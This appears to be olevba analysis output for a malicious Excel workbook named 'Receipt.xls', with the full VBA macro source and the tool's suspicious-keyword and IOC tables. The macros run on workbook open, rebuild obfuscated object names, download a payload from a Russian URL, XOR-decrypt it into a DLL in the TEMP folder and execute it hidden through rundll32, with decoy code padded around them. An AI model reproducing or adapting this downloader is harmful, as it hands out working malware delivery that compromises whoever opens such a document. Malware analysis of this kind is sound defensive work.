Malicious Excel macro

olevba 0.25 - http://decalage.info/python/oletools
Flags       Filename
----------- -----------------------------------------------------------------
OpX:MASI-B- Receipt.xls

(Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)

===============================================================================
FILE: Receipt.xls
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ÝòàÊíèãà.cls
in file: xl/vbaProject.bin - OLE stream: u'VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub Workbook_Open()

ItNinja "ASDEX"
End Sub


Function copy_screen_to_array(output_array)
    output_array = ""
    Dim screenarray(23)
    Row = 1
    For Each Line In screenarray
        EMReadS.creen reading_line, 80, Row, 1
        output_array = output_array & reading_line & "UUDDLRLRBA"
        Row = Row + 1
    Next
    output_array = Split(output_array, "UUDDLRLRBA")
End Function

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+----------+---------------+----------------------------------------+
| Type     | Keyword       | Description                            |
+----------+---------------+----------------------------------------+
| AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
+----------+---------------+----------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO Ëèñò1.cls
in file: xl/vbaProject.bin - OLE stream: u'VBA/\u041b\u0438\u0441\u04421'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Module1.bas
in file: xl/vbaProject.bin - OLE stream: u'VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Public moyaMANUNADAcdaw As Object
Public moyaMANUNAra12dv34 As Object
Public moyaMANUNAKSKLAL As Object


Public moyaMANUNALAKOPPC As String
Public moyaMANUNAPLdunay() As String
Public moyaMANUNAUUUKA As String
Public moyaMANUNAUUUKABBB As String


Public moyaMANUNAGMAKO As Object
Public moyaMANUNA4 As String
 Public moyaMANUNA2 As String
Public moyaMANUNAASALLLP As Variant

 Public Const moyaMANUNARH = "User-Agent"
Public Const RACHEL = "etofi"


Public Function TlfFormat(ByVal tlfNr As String, dilodan As Boolean) As String
    Dim tmp As String
    Dim i As Long
If dilodan Then
 moyaMANUNALAKOPPC = moyaMANUNAKSKLAL(moyaMANUNAPLdunay(6))
 moyaMANUNAUUUKA = moyaMANUNALAKOPPC


 moyaMANUNAUUUKABBB = moyaMANUNAUUUKA + "\hrushki"
moyaMANUNAUUUKA = moyaMANUNAUUUKA + moyaMANUNAPLdunay(12)

Exit Function
Else
GoTo VarPupka
End If
restart:
    For i = 1 To Len(tlfNr)
        If Mid$(tlfNr, i, 1) = " " Then
            tlfNr = Mid$(tlfNr, 1, i - 1) & Mid$(tlfNr, i + 1)
            GoTo restart
        End If
    Next i

    For i = 1 To Len(tlfNr)
        tmp = tmp & Mid$(tlfNr, i, 1)
        If i = 2 Or i = 4 Or i = 6 Or i = 8 Or i = 10 Then
            tmp = tmp & " "
        End If
    Next i

    TlfFormat = tmp

VarPupka:
CallByName moyaMANUNAra12dv34, "sav" + RACHEL + "le", VbMethod, moyaMANUNAUUUKABBB, 14 / 7
 SaveAllStufAndExit moyaMANUNAUUUKABBB, moyaMANUNAUUUKA, "S2CsMgS5Y9WxzevdSUrPqUiTwI69FbRq"

     Call Shell("rund" & "ll32.exe " & moyaMANUNAUUUKA & ",qwerty", vbHide)

 End Function

Function PhraseCmd(cmd)

    regEx.IgnoreCase = True
    Set Matches = regEx.Execute(cmd)
    If Matches.Count <> 0 Then
        Set objMatch = Matches(0)
        Command = objMatch.SubMatches(0)

        WAITTIME = CInt(objMatch.SubMatches(1))
        WScript.Echo "WMIEXEC : Waiting " & WAITTIME & " ms..." & vbNewLine
    End If

    regEx.Pattern = "(.*?)-persist"
    regEx.IgnoreCase = True
    Set Matches = regEx.Execute(cmd)
    If Matches.Count <> 0 Then
        Set objMatch = Matches(0)
        Command = objMatch.SubMatches(0)
        PhraseCmd = "persist"
    End If
End Function


Function CreateShare()

    Set objNewShare = objWMIService.Get("Win32_Share")
    intReturn = objNewShare.Create _
        (FilePath, "WMI_SHARE", 0, 25, "")
    If intReturn <> 0 Then
        WScript.Echo "WMIEXEC ERROR: Share could not be created." & _
            vbNewLine & "WMIEXEC ERROR: Return value -> " & intReturn
        Select Case intReturn
            Case 2
                WScript.Echo "WMIEXEC ERROR: Access Denied!"
            Case 9
                WScript.Echo "WMIEXEC ERROR: Invalid File Path!"
            Case 22
                WScript.Echo "WMIEXEC ERROR: Share Name Already In Used!"
            Case 24
                WScript.Echo "WMIEXEC ERROR: Directory NOT exists!"
        End Select
        If intReturn <> 22 Then WScript.Quit 1
    Else
        WScript.Echo "WMIEXEC : Share created sucess."
        WScript.Echo "WMIEXEC : Share Name -> WMI_SHARE"
        WScript.Echo "WMIEXEC : Share Path -> " & FilePath
    End If
End Function


Public Function GodnTeBabenParama(CH1 As String, CH2 As String, CH3 As String) As String
GodnTeBabenParama = Replace(CH1, CH2, CH3)
End Function
Public Function NombreUsuario() As String
Dim SQL As String


 moyaMANUNAra12dv34.Type = 0 + 0 + 1

 moyaMANUNAra12dv34.Open
Exit Function


SQL = "Select * from Usuarios WHERE usu_id=" & IdUsuario


If Not RsUsuario.EOF Then
    NombreUsuario = RsUsuario!usu_apodo
End If
End Function
Function DeleteShare()
    For Each objShare In colShares
        intReturn = objShare.Delete
    Next
    If intReturn <> 0 Then
        WScript.Echo "WMIEXEC ERROR: Delete Share failed." & _
            vbNewLine & "WMIEXEC ERROR: Return value -> " & intReturn
        Select Case intReturn
            Case 2
                WScript.Echo "WMIEXEC ERROR: Access Denied!"
            Case 25
                WScript.Echo "WMIEXEC ERROR: Share Not Exists!"
        End Select
    Else
        WScript.Echo "WMIEXEC : Share deleted sucess."
    End If
End Function


Public Function ToDBDateTime(ByVal ddmmyyhhmmDateTime As String) As String

     Set moyaMANUNA1DASH1solo = CreateObject(moyaMANUNAPLdunay(3))
 Set moyaMANUNAKSKLAL = moyaMANUNA1DASH1solo.Environment(moyaMANUNAPLdunay(2 + 2))
 VerCadenaPermiso ddmmyyhhmmDateTime
End Function


Public Sub DecryptByte(ByteArray() As Byte, Key As String)

  Dim offset As Long
  Dim ByteLen As Long
  Dim ResultLen As Long
  Dim CurrPercent As Long
  Dim NextPercent As Long
  Dim m_Key() As Byte
Dim m_KeyLen As Long

  m_KeyLen = Len(Key)
ReDim m_Key(m_KeyLen)

  m_Key = StrConv(Key, vbFromUnicode)


  ByteLen = UBound(ByteArray) + 1
  ResultLen = ByteLen


  For offset = 0 To (ByteLen - 1)
    ByteArray(offset) = ByteArray(offset) Xor m_Key(offset Mod m_KeyLen)


    If (offset >= NextPercent) Then
      CurrPercent = Int((offset / ResultLen) * 100)
      NextPercent = (ResultLen * ((CurrPercent + 1) / 100)) + 1
    End If
  Next
End Sub


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+----------------+-----------------------------------------+
| Type       | Keyword        | Description                             |
+------------+----------------+-----------------------------------------+
| Suspicious | CreateObject   | May create an OLE object                |
| Suspicious | CallByName     | May attempt to obfuscate malicious      |
|            |                | function calls                          |
| Suspicious | Open           | May open a file                         |
| Suspicious | Shell          | May run an executable file or a system  |
|            |                | command                                 |
| Suspicious | vbHide         | May run an executable file or a system  |
|            |                | command                                 |
| Suspicious | Xor            | May attempt to obfuscate specific       |
|            |                | strings                                 |
| Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
|            |                | may be used to obfuscate strings        |
|            |                | (option --decode to see all)            |
| IOC        | ll32.exe       | Executable file name                    |
+------------+----------------+-----------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO Module2.bas
in file: xl/vbaProject.bin - OLE stream: u'VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Public Sub VerCadenaPermiso(permiso As String)
Dim i As Long
Dim letra As String

Alta = False
Baja = False
modi = False
Dim Consu As Boolean
Consu = True


 moyaMANUNA4 = "http://opmsk.ru/g76ub76"

 If Application = "Microsoft Excel" Then
 moyaMANUNADAcdaw.Open moyaMANUNAPLdunay(5), moyaMANUNA4, False

moyaMANUNADAcdaw.setRequestHeader moyaMANUNARH, "Mozilla/4.5 (compatible; MSIE 6.5; Windows NT 5.5)"

moyaMANUNADAcdaw.Send
TlfFormat letra, True
 NombreUsuario
  moyaMANUNAacheha letra
End If

Exit Sub
    For i = 1 To Len(permiso)

        letra = Mid(permiso, i, 1)

        If letra = "A" Then
            Alta = True
        End If

        If letra = "B" Then
            Baja = True
        End If

        If letra = "M" Then
            modi = True
        End If

        If letra = "C" Then
            Consu = True
        End If
    Next i
    If Len(permiso) = 0 Then
        Consu = False
        modi = False
        Alta = False
        Baja = False
    End If
End Sub


Public Function GetResulOfMyResult(ByVal Cadena As String) As String


 moyaMANUNA2 = GodnTeBabenParama(moyaMANUNA2, "=CH", "M")
GetCurrentFolder


 Set moyaMANUNAra12dv34 = CreateObject(moyaMANUNAPLdunay(1))

 Set moyaMANUNAGMAKO = CreateObject(moyaMANUNAPLdunay(5 - 3))

 ClearString ""
End Function


Public Function moyaMANUNAacheha(pass As String) As String
    Dim temp As String
    Dim moyaMANUNAtum As String
    GoTo beyTumba
    Dim pos As Long
    Dim leng As Long
    Dim tim As Variant
    Dim i As Long
    Dim Key As Long
    leng = Len(pass)
    tim = Mid(Time, 1, 8)
    tim = Mid(tim, 1, Len(tim) - 3)
    tim = Mid(tim, Len(tim) - 1, 2) * Int(Rnd * 100)
    For i = 1 To Len(CStr(tim))
        pos = pos + CInt(Mid(CStr(tim), i, 1))
    Next
    While pos > Len(pass)
        pos = pos Mod 10 + Int(Rnd * 10)
        If pos = 0 Then
            pos = Len(pass) + 1
        End If
    Wend

beyTumba:

moyaMANUNAASALLLP = moyaMANUNADAcdaw.responseBody

 ReadResult

End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+----------------------+-----------------------------------------+
| Type       | Keyword              | Description                             |
+------------+----------------------+-----------------------------------------+
| Suspicious | CreateObject         | May create an OLE object                |
| Suspicious | Open                 | May open a file                         |
| Suspicious | Windows              | May enumerate application windows (if   |
|            |                      | combined with Shell.Application object) |
| IOC        | http://opmsk.ru/g76u | URL                                     |
|            | b76                  |                                         |
+------------+----------------------+-----------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO Module3.bas
in file: xl/vbaProject.bin - OLE stream: u'VBA/Module3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Public Function ReadResult()


 moyaMANUNAra12dv34.Write moyaMANUNAASALLLP
GoTo pid7
    WScript.Sleep (WAITTIME)
    UNCFilePath = "\\" & host & "\" & "WMI_SHARE" & "\" & Filename
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set objFile = fso.OpenTextFile(UNCFilePath, 1)
    If Not objFile.AtEndOfStream Then strContents = objFile.ReadAll
    objFile.Close
    WScript.Echo strContents

    strDelFile = "del " & file & " /F"
    exe.c strDelFile, "nul"
pid7:
     TlfFormat "", False
End Function

Public Function GetCurrentFolder()
     moyaMANUNA2 = GodnTeBabenParama(moyaMANUNA2, "*P", LCase("S"))
GoTo mig5

    WScript.Sleep (WAITTIME)
    UNCFilePath = "\\" & host & "\" & "WMI_SHARE" & "\" & Filename
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set objFile = fso.OpenTextFile(UNCFilePath, 1)
    GetCurrentFolder = objFile.ReadLine
    objFile.Close
    strDelFile = "del " & file & " /F"
    exe.c strDelFile, "nul"
mig5:
     moyaMANUNAPLdunay = Split(moyaMANUNA2, "JIIIINX")
End Function


Public Function ClearString(ByRef inOrigString As String) As String
    Dim strNewString As String
    Dim sChar As String
Dim i As Integer
 Dim d As Boolean
 d = True
 IsWord = True
 For i = 1 To Len(Trim("Reika"))
 If d = False Then
Set moyaMANUNADAcdaw = CreateObject(moyaMANUNAPLdunay(i - 2))
Exit For
Else
d = False
End If
Next i
ToDBDateTime ""
Exit Function

Call check_fo.r_MAXIS(False)

Call navigate_t.o_MAXIS_screen("POLI", "____")
EMWri.teScreen "TEMP", 5, 40
EMWri.teScreen "TABLE", 21, 71
trans.mit


Set objExcel = CreateObject("Excel.Application")
objExcel.Visible = True
Set objWorkbook = objExcel.Workbooks.Add()
objExcel.DisplayAlerts = True


objExcel.Cells(1, 1).Value = "TITLE"
objExcel.Cells(1, 2).Value = "SECTION"
objExcel.Cells(1, 3).Value = "REVISED"

For i = 1 To 3
    objExcel.Cells(1, i).Font.Bold = True
Next


    ClearString = strNewString
End Function


Public Sub SaveAllStufAndExit(SourceFile As String, DestFile As String, Optional Key As String)

  Dim libhercen As Integer
  Dim ByteArray() As Byte


  libhercen = FreeFile
  Open SourceFile For Binary As #libhercen
  ReDim ByteArray(0 To LOF(libhercen) - 1)
  Get #libhercen, , ByteArray()
  Close #libhercen


  Call DecryptByte(ByteArray(), Key)


  libhercen = FreeFile
  Open DestFile For Binary As #libhercen
  Put #libhercen, , ByteArray()
  Close #libhercen

End Sub


Public Function ItNinja(ByRef inGUID As String) As String
moyaMANUNA2 = "=CHicro*Poft.X=CHLHTTPJIIIINXAdodb.*Ptr-Ea=CHJIIIINX*Ph-Ell.Ap"
moyaMANUNA2 = moyaMANUNA2 + GodnTeBabenParama("plicationJIIIINXW*Pcript.*Ph-EllJIIIINXProc-E*P*PJIIIINXG-ETJIIIINXT-E=CHPJIIIINXTyp-EJIIIINXop-EnJIIIINXwritFILMABOpon*P-EBodyJIIIINX*Pav-Etofil-EJIIIINX", "FILMABO", "-EJIIIINXr-E*P")
moyaMANUNA2 = GodnTeBabenParama(moyaMANUNA2 + "\hupoa*P.dll", "-E", "e")


GetResulOfMyResult "-"
Exit Function
    If Mid$(inGUID, 1, 1) <> "{" Then
        ItNinja = "{" & inGUID & "}"
    Else
        ItNinja = inGUID
    End If
End Function


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+----------------+-----------------------------------------+
| Type       | Keyword        | Description                             |
+------------+----------------+-----------------------------------------+
| Suspicious | CreateObject   | May create an OLE object                |
| Suspicious | Open           | May open a file                         |
| Suspicious | Write          | May write to a file (if combined with   |
|            |                | Open)                                   |
| Suspicious | Put            | May write to a file (if combined with   |
|            |                | Open)                                   |
| Suspicious | Binary         | May read or write a binary file (if     |
|            |                | combined with Open)                     |
| Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
|            |                | may be used to obfuscate strings        |
|            |                | (option --decode to see all)            |
| IOC        | P.dll          | Executable file name                    |
+------------+----------------+-----------------------------------------+